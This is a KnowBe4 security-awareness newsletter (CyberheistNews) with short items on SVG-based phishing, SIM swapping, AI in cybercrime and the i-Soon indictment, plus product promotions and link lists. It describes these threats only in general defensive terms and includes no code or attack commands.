CyberheistNews Vol 15 #11 [Heads Up] 245% Increase in SVG Files Used to Obfuscate Phishing Payloads

[Heads Up] 245% Increase in SVG Files Used to Obfuscate Phishing Payloads

The KnowBe4 Threat Research team has observed a sustained increase in the use of Scalable Vector Graphics (SVG) files to obfuscate malicious payloads.

SVGs are vector based, rather than pixel-based like PNGs and JPGs. This means the graphic elements can be scaled up without loss of quality — making them perfect for sharing graphics, such as logos and icons, via email.

In a now well-established pattern (think QR codes and quishing attacks), cybercriminals are attempting to take advantage of the growing use of this file type, hoping familiarity will lead to complacency in the targets of their phishing attacks.

As we'll also discuss later, SVG files offer technical advantages to cybercriminals looking to evade traditional email security filters. Our Threat Research team analyzed phishing emails sent between January 1 and March 5, 2025, discovering that SVG files accounted for 6.6% of malicious attachments in phishing emails detected by KnowBe4 Defend, a leading Integrated Cloud Email Security product for M365.

This is a 245% increase when compared to attacks sent between October 1 and December 31, 2024, during which time SVGs made up only 1.9%. The largest spike to date occurred on March 4, with SVGs accounting for 29.5% of all malicious attachments.

Blog post with links, graphs, screenshots and technical background:
https://blog.knowbe4.com/245-increase-in-svg-files-used-to-obfuscate-phishing-payloads

Building Your Most Robust Defense Against Advanced Phishing Attacks

Sophisticated phishing attacks are bypassing traditional defenses, putting your users at unprecedented risk. With 68% of data breaches involving a human element, you need a multi-layered approach that goes beyond SEGs.

Transform your employees from vulnerabilities into active cybersecurity assets while strengthening your email security.

Join us for a live demo showcasing how KnowBe4 Defend and PhishER work together. Get the most robust defense against advanced phishing attacks while streamlining your incident response process.

See how KnowBe4 Defend and PhishER can help you:

• Detect and prevent advanced phishing attacks, including Business Email Compromise, before they reach your users' inboxes
• Rapidly identify, respond to and remediate threats that bypass your other defenses
• Reduce the burden on your IT and security teams through intelligent automation
• Continuously educate and engage your users in security best practices
• Gain comprehensive visibility into email-based risks and user behavior unique to your organization

Tap into the power of proactive threat detection and efficient incident response to build your most robust email security infrastructure yet.

Date/Time: TOMORROW, Wednesday, March 19 @ 2:00 PM (ET)

Save My Spot:
https://info.knowbe4.com/phisher-defend-demo?partnerref=CHN2

Make Your Real Emails Less Phishy

By Roger Grimes

I infrequently get emails from customers who are frustrated because their employer sent out some legitimate mass email to all employees that unfortunately had all the hallmarks of a malicious phishing attack.

Everyone gets worked up about it, and a large percentage of people report it as a possible phishing attack. And it is not. It is just frustrating.

Sound familiar?

Note: Out of all the cybersecurity problems you can have, this is not a bad one; people reporting "phishy" things is better than people clicking on real phishing links.

But it is still frustrating. Everyone who sends emails or any communications message should strive to make them seem less phishy, especially people who create and send mass emails. You would think they automatically know how to do this, but it is apparent many people who are working hard, get caught up in the moment, and craft and send something that is…let's say…sub-optimal.

If you have someone like that in your environment, spread the word — Do not send emails that look a lot like phishing attacks.

What Do I Mean Less Phishy?

Paraphrasing Supreme Court Justice Potter Stewart's statement in a 1964 obscenity case, "I can't describe it, but I know it when I see it!"

Here are the signs of an email that might be mistaken for a phishing attack.

[CONTINUED] At the KnowBe4 Blog with a list of points to watch for:
https://blog.knowbe4.com/make-your-real-emails-less-phishy

[FREE RESOURCE KIT] Phishing Security Resources

Phishing emails increase in volume annually, so we created this free resource kit to help you defend against attacks. Request your kit now to learn phishing mitigation strategies, what new trends and attack vectors you need to be prepared for, and our best advice on how to protect your users and your organization.

Here is what you'll get:

• Access to our free on-demand webinar Your Ultimate Guide to Phishing Mitigation featuring Roger A. Grimes, KnowBe4's Data-Driven Defense Evangelist
• Our most popular phishing whitepaper: Comprehensive Anti-Phishing Guide E-Book
• A video that explains How to Avoid Phishing Attacks
• Our most recent quarterly infographic on Top-Clicked Phishing Email Subjects Infographic
• Posters and digital signage to remind users about what to watch out for

Get Your Free Phishing Security Resources Now!
https://www.knowbe4.com/phishing-resource-kit-chn

AI and AI-Agents: A Game-Changer for Both Cybersecurity and Cybercrime

By Anna Collard

Artificial Intelligence is no longer just a tool—it is a game changer in our lives, our work as well as in both cybersecurity and cybercrime.

While organizations leverage AI to enhance defenses, cybercriminals are weaponizing AI to make these attacks more scalable and convincing.

In 2025, researchers forecast that AI agents, or autonomous AI-driven systems capable of performing complex tasks with minimal human input, are revolutionizing both cyberattacks and cybersecurity defenses.

While AI-powered chatbots have been around for a while, AI agents go beyond simple assistants, functioning as self-learning digital operatives that plan, execute and adapt in real time. These advancements don't just enhance criminal tactics—they may fundamentally change the cybersecurity battlefield.

How Cybercriminals Are Weaponizing AI: The New Threat Landscape

AI is transforming cybercrime, making attacks more scalable, efficient and accessible. The WEF Artificial Intelligence and Cybersecurity Report (2025) highlights how AI has democratized cyber threats, enabling attackers to automate social engineering, expand phishing campaigns and develop AI-driven malware.

Similarly, the Orange Cyberdefense Security Navigator 2025 warns of AI-powered cyber extortion, deepfake fraud and adversarial AI techniques. And the 2025 State of Malware Report by Malwarebytes notes, while Generative AI (GenAI) has enhanced cybercrime efficiency, it hasn't yet introduced entirely new attack methods—attackers still rely on phishing, social engineering and cyber extortion, now amplified by AI.

However, this is set to change with the rise of AI agents—autonomous AI systems capable of planning, acting, and executing complex tasks—posing major implications for the future of cybercrime.

Here is a list of common (ab)use cases of AI by cybercriminals:

[CONTINUED] At the KnowBe4 Blog, including a list of mitigation measures:
https://blog.knowbe4.com/ai-and-ai-agents-a-game-changer-for-both-cybersecurity-and-cybercrime

Download Your Ransomware Hostage Rescue Manual

Free your files! Get the most informative and complete hostage rescue manual on ransomware.

This manual is packed with actionable info that you need to prevent infections, and what to do when you are hit with ransomware. You will also receive a Ransomware Attack Response Checklist and Ransomware Prevention Checklist.

You will learn more about:

• What is ransomware?
• Am I infected?
• I'm infected, now what?
• Protecting yourself in the future
• Resources

Don't be taken hostage by ransomware. Download your rescue manual now!

Download Now:
https://info.knowbe4.com/ransomware-hostage-rescue-manual-chn

Did You Know?

KnowBe4 has a library of the most popular webinars we have hosted. Some of these had thousands of people attending at the initial event, and are still watched by substantial amounts of people every week.

At the moment, the featured webinar is:

Code Red: How KnowBe4 Exposed a North Korean IT Infiltration Scheme

Watch this exclusive, no-holds-barred conversation with the team who lived through it. Perry Carpenter, our Chief Human Risk Management Strategist, sits down with Brian Jack, Chief Information Security Officer, and Ani Banerjee, Chief Human Resources Officer, to chat about how we spotted the red flags and stopped it before any damage was done.

Highly recommended! See it here:
https://www.knowbe4.com/webinar-library

Let's stay safe out there.

Warm Regards,

Stu Sjouwerman, SACP
Founder and CEO
KnowBe4, Inc.

PS: [BUDGET AMMO #1] Five Coercive Tactics Used By Ransomware Operators To Pressure Victims Into Paying via @forbes:
https://www.forbes.com/councils/forbestechcouncil/2025/03/10/five-coercive-tactics-used-by-ransomware-operators-to-pressure-victims-into-paying/

PPS: [BUDGET AMMO #2] Beware of DeepSeek Hype: It's a Breeding Ground for Scammers:
https://www.securityweek.com/beware-of-deepseek-hype-its-a-breeding-ground-for-scammers/

You can read CyberheistNews online at our Blog
https://blog.knowbe4.com/cyberheistnews-vol-15-11-heads-up-245-increase-in-svg-files-used-to-obfuscate-phishing-payloads

U.S. Justice Department Charges China's Hackers-for-Hire Working IT Contractor i-Soon

The U.S. Justice Department has charged ten Chinese nationals for acting as hackers-for-hire for the Chinese government.

The defendants worked for Chinese IT contractor i-Soon, which is accused of offering hacking services for China's Ministry of Public Security (MPS) and Ministry of State Security (MSS).

According to the FBI, the hackers compromised "US-based critics of the Chinese government and Chinese dissidents, a US news organization, a large US-based religious organization, multiple governments in Asia and US federal and state government agencies."

The DOJ says i-Soon was paid up to $75,000 for each email account that was breached. "i-Soon and its employees, to include the defendants, generated tens of millions of dollars in revenue as a key player in the PRC's hacker-for-hire ecosystem," the Justice Department says.

"In some instances, i-Soon conducted computer intrusions at the request of the MSS or MPS, including cyber-enabled transnational repression at the direction of the MPS officer defendants.

"In other instances, i-Soon conducted computer intrusions on its own initiative and then sold, or attempted to sell, the stolen data to at least 43 different bureaus of the MSS or MPS in at least 31 separate provinces and municipalities in China. i-Soon charged the MSS and MPS between approximately $10,000 and $75,000 for each email inbox it successfully exploited.

"i-Soon also trained MPS employees how to hack independently of i-Soon and offered a variety of hacking methods for sale to its customers."

The FBI notes that i-Soon is just one of many Chinese security firms contracted by the Chinese government to carry out hacking operations against its targets.

"China's InfoSec ecosystem flourishes because China's government agencies, including its primary intelligence service the Ministry of State Security (MSS) and its domestic police agency the Ministry of Public Security (MPS), weaponize InfoSec companies by tasking companies that advertise legitimate cybersecurity services to also use their expertise to gain unauthorized access to victim networks to collect for China's intelligence services," the Bureau says.

"This ecosystem of InfoSec companies and freelance hackers enables and encourages indiscriminate global cyber activity, while providing the Chinese government with a layer of plausible deniability."

KnowBe4 empowers your workforce to make smarter security decisions every day. Over 70,000 organizations worldwide trust the KnowBe4 platform to strengthen their security culture and reduce human risk.

Blog post with links:
https://blog.knowbe4.com/us-justice-department-charges-chinas-hackers-for-hire

Protect Yourself: Social Engineering Fuels SIM Swapping Attacks

Group-IB has published a report on SIM swapping attacks, finding that attackers continue to use social engineering to bypass technical security measures.

SIM swapping is a technique in which an attacker takes over a victim's phone number, which enables them to access the victim's accounts. This involves tricking the telecom operator into reassigning the victim's phone number to a SIM card controlled by the attacker.

"SIM swapping fraud typically begins when the fraudster acquires sensitive information about the victim, such as their national ID, phone number and card details," Group-IB explains. "This information is often obtained through phishing websites that mimic legitimate services or via social engineering tactics.

"Once armed with the necessary details, the fraudster initiates a request to swap or port out the victim's SIM. This may involve converting the victim's SIM to an eSIM with the same mobile network provider or porting the number to a different local telecom operator. These requests are often submitted through telecom provider mobile apps, enabling the process to be completed remotely."

Mobile carriers have safeguards in place to prevent SIM swapping, but attackers can bypass these using social engineering. In some cases, the attackers also target the victims themselves and trick them into authorizing the switch.

"In some regions, this process is safeguarded by a Government E-Verification Platform, which requires users to verify their identity before any SIM swap or port-out request is approved," the researchers write. "Verification methods may include approving a login request or using biometric authentication.

"To bypass these safeguards, fraudsters deceive victims into approving the verification request, often by posing as representatives of legitimate services—such as job applications or account updates.

"Once the victim unknowingly authorizes the request, the telecom provider deactivates the existing SIM and activates a new one under the fraudster's control. With control of the victim's phone number, fraudsters can intercept SMS-based two-factor authentication (2FA) codes and carry out unauthorized transactions."

Blog post with links:
https://blog.knowbe4.com/protect-yourself-social-engineering-fuels-sim-swapping-attacks

What KnowBe4 Customers Say

"Hi Stu, Yes, we are extremely happy with KnowBe4. Support assistance has been stellar. We have completed our baseline phishing and are embarking on a ‘holiday' themed one shortly to test our staff, after already sending out several training campaigns.

"And our HR department is simply loving the ability to upload policy documents and send out as training assignments where they are able to track each individual's sign off.

"We still have a ways to go in training our staff to be vigilant, with so many people being service field workers and not tech savvy, but they are getting better. Thank you so much for reaching out!"

- S.L., Team Lead, Business Systems, IT

1. ClickFix: How to Infect Your PC in Three Easy Steps
   https://krebsonsecurity.com/2025/03/clickfix-how-to-infect-your-pc-in-three-easy-steps/
   
   
2. KnowBe4 Research Reveals a Confidence Gap in Cybersecurity, Leaving Organizations at Risk:
   https://www.morningstar.com/news/globe-newswire/9392246/knowbe4-research-reveals-a-confidence-gap-in-cybersecurity-leaving-organizations-at-risk
   
   
3. The AI race: Dark AI is in the lead, but good AI is catching up:
   https://www.bleepingcomputer.com/news/security/the-ai-race-dark-ai-is-in-the-lead-but-good-ai-is-catching-up/
   
   
4. 95% of data breaches involve human error, report reveals:
   https://www.scworld.com/news/95-of-data-breaches-involve-human-error-report-reveals
   
   
5. Despite FBI And CISA Ransomware Advice, The Hackers Must Be Laughing:
   https://www.forbes.com/sites/daveywinder/2025/03/13/fbi-warning-enable-2fa-for-gmail-outlook-and-vpns-now/
   
   
6. US cities warn of wave of unpaid parking phishing texts:
   https://www.bleepingcomputer.com/news/security/us-cities-warn-of-wave-of-unpaid-parking-phishing-texts
   
   
7. Suspected LockBit Ransomware Developer Extradited to US:
   https://www.govinfosecurity.com/suspected-lockbit-ransomware-developer-extradited-to-us-a-27727
   
   
8. Water utilities would get cybersecurity boost under bipartisan Senate bill:
   https://cyberscoop.com/rural-water-utilities-cybersecurity-senate-bill/
   
   
9. Symantec says AI agents can already be used to launch phishing campaigns:
   https://www.security.com/threat-intelligence/ai-agent-attacks
   
   
10. North Korean threat actors plant malicious apps in the Google Play Store:
    https://www.lookout.com/threat-intelligence/article/lookout-discovers-new-spyware-by-north-korean-apt37
    
    

• [SUPER FAVE] Virtual Vaca #1 To The Real India Revealed in 14 Minutes (4K):
  https://youtu.be/rTDaZoDDW5g
  
  
• Virtual Vaca #2 Argentina in 4K - Incredible Scenes & Uncovering Hidden Gems:
  https://youtu.be/XEb1BHJamyw
  
  
• Virtual Vaca #3 to the past: A 1920s English Country House Revisited in 4K Color with Sound:
  https://youtu.be/GSkVlI9CDMc
  
  
• Skydiving 25,000ft Without A Parachute. The most outrageous skydive ever attempted:
  https://youtu.be/E3roGaRSyC4
  
  
• Exploring the Weisshorn Wingsuit Flight:
  https://youtu.be/hq3M_LkNZgo
  
  
• Why Berlin Built a $7BN Empty Airport:
  https://youtu.be/lVcg8uHKuwo
  
  
• Need some space? The Real 4K HDR 60FPS Dolby Vision (4K Video ULTRA HD):
  https://youtu.be/UG5O35YtgTA
  
  
• Maserati – The MC20 world record:
  https://youtu.be/3Y21hGCPcIA
  
  
• First-ever wingsuit flight over Tokyo. We have an office there:
  https://youtu.be/f6JFLOGKmLc
  
  
• Best Hikes in the World- To Try Before You Die:
  https://youtu.be/2fQZcnSvf-g
  
  
• [FUN] This drummer-juggler-comedian-clown is astounding. Your kids are going to love him:
  https://youtu.be/5BPWITr6G9U
  
  
• For Da Kids #1 - Dog Raised By Bunnies Thinks He's One Of Them:
  https://youtu.be/1d6ZRI02c_A
  
  
• For Da Kids #2 - Cat Shows Up On Time For Work Every Day:
  https://youtu.be/Dkr4Kvtw48I
  
  
• For Da Kids #3- Horse Escaped To Run With His Herd To Freedom:
  https://youtu.be/BRjsdrWtM08
  
  
• For Da Kids #4 - Woman Brought Home 2 Baby Servals. They Took Over House:
  https://youtu.be/pEFTtBEOoVs
  
  
• For Da Kids #5 - Dog Goes Undercover To Get His Ball Back:
  https://youtu.be/YMg20pSN9u4